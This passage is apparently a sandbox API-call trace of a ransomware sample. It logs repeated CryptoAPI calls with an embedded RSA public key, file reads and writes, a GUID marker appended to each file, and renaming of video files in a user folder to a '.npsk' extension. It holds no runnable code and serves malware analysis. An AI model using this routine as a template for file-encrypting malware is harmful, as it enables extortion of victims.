KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.146] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.146] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b2018) returned 1 [0216.147] CryptCreateHash (in: hProv=0x7b2018, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.147] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.147] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.147] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.147] GetLastError () returned 0x0 [0216.147] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.147] CryptReleaseContext (hProv=0x7b2018, dwFlags=0x0) returned 1 [0216.147] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.147] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.147] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.148] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.148] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x1688b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.148] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.148] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.148] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.148] CloseHandle (hObject=0x61c) returned 1 [0216.150] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\lxZOp9a3-tLAfUP65SfR.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\lxzop9a3-tlafup65sfr.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\lxZOp9a3-tLAfUP65SfR.avi.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\lxzop9a3-tlafup65sfr.avi.npsk")) returned 1 [0216.151] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d71b150, ftCreationTime.dwHighDateTime=0x1d5dde9, ftLastAccessTime.dwLowDateTime=0x9d72ceb0, ftLastAccessTime.dwHighDateTime=0x1d5dbb8, ftLastWriteTime.dwLowDateTime=0x9d72ceb0, ftLastWriteTime.dwHighDateTime=0x1d5dbb8, nFileSizeHigh=0x0, nFileSizeLow=0x6085, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NH3SLzbW8s.avi", cAlternateFileName="NH3SLZ~1.AVI")) returned 1 [0216.151] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\NH3SLzbW8s.avi") returned=".avi" [0216.151] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\NH3SLzbW8s.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\nh3slzbw8s.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.152] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=24709) returned 1 [0216.152] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.153] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x605f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.153] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.155] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x6085, lpOverlapped=0x0) returned 1 [0216.155] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.155] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.155] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.156] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0216.156] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.156] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.157] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.157] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.157] GetLastError () returned 0x0 [0216.157] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.157] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0216.157] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.157] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.157] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.157] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.157] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x6085, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.158] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.158] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.158] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.158] CloseHandle (hObject=0x61c) returned 1 [0216.159] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\NH3SLzbW8s.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\nh3slzbw8s.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\NH3SLzbW8s.avi.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\nh3slzbw8s.avi.npsk")) returned 1 [0216.160] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1131f6b0, ftCreationTime.dwHighDateTime=0x1d5e2b6, ftLastAccessTime.dwLowDateTime=0xd0e25c20, ftLastAccessTime.dwHighDateTime=0x1d5dbef, ftLastWriteTime.dwLowDateTime=0xd0e25c20, ftLastWriteTime.dwHighDateTime=0x1d5dbef, nFileSizeHigh=0x0, nFileSizeLow=0x101c6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PISdf6g6Q65B.mkv", cAlternateFileName="PISDF6~1.MKV")) returned 1 [0216.161] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PISdf6g6Q65B.mkv") returned=".mkv" [0216.161] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PISdf6g6Q65B.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pisdf6g6q65b.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.161] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=65990) returned 1 [0216.161] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.163] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x101a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.163] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.164] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x101c6, lpOverlapped=0x0) returned 1 [0216.165] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.165] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.165] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.165] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0216.166] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.166] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.166] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.166] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.166] GetLastError () returned 0x0 [0216.166] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.166] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0216.166] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.166] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.166] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.166] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.167] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x101c6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.167] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.167] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.167] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.167] CloseHandle (hObject=0x61c) returned 1 [0216.168] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PISdf6g6Q65B.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pisdf6g6q65b.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PISdf6g6Q65B.mkv.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pisdf6g6q65b.mkv.npsk")) returned 1 [0216.171] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6b146e0, ftCreationTime.dwHighDateTime=0x1d5ddba, ftLastAccessTime.dwLowDateTime=0x5c6097c0, ftLastAccessTime.dwHighDateTime=0x1d5e2e5, ftLastWriteTime.dwLowDateTime=0x5c6097c0, ftLastWriteTime.dwHighDateTime=0x1d5e2e5, nFileSizeHigh=0x0, nFileSizeLow=0x177c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qh988YS dTfW.mkv", cAlternateFileName="QH988Y~1.MKV")) returned 1 [0216.171] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qh988YS dTfW.mkv") returned=".mkv" [0216.171] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qh988YS dTfW.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qh988ys dtfw.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.171] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=96196) returned 1 [0216.171] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.173] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x1779e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.173] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.174] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x177c4, lpOverlapped=0x0) returned 1 [0216.175] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.175] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.175] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.175] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0216.176] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.176] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.176] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.176] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.176] GetLastError () returned 0x0 [0216.176] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.176] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0216.177] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.177] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.177] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.177] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.178] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x177c4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.178] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.178] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.178] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.178] CloseHandle (hObject=0x61c) returned 1 [0216.180] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qh988YS dTfW.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qh988ys dtfw.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qh988YS dTfW.mkv.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qh988ys dtfw.mkv.npsk")) returned 1 [0216.181] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaa850a0, ftCreationTime.dwHighDateTime=0x1d5dd51, ftLastAccessTime.dwLowDateTime=0x20be2840, ftLastAccessTime.dwHighDateTime=0x1d5db74, 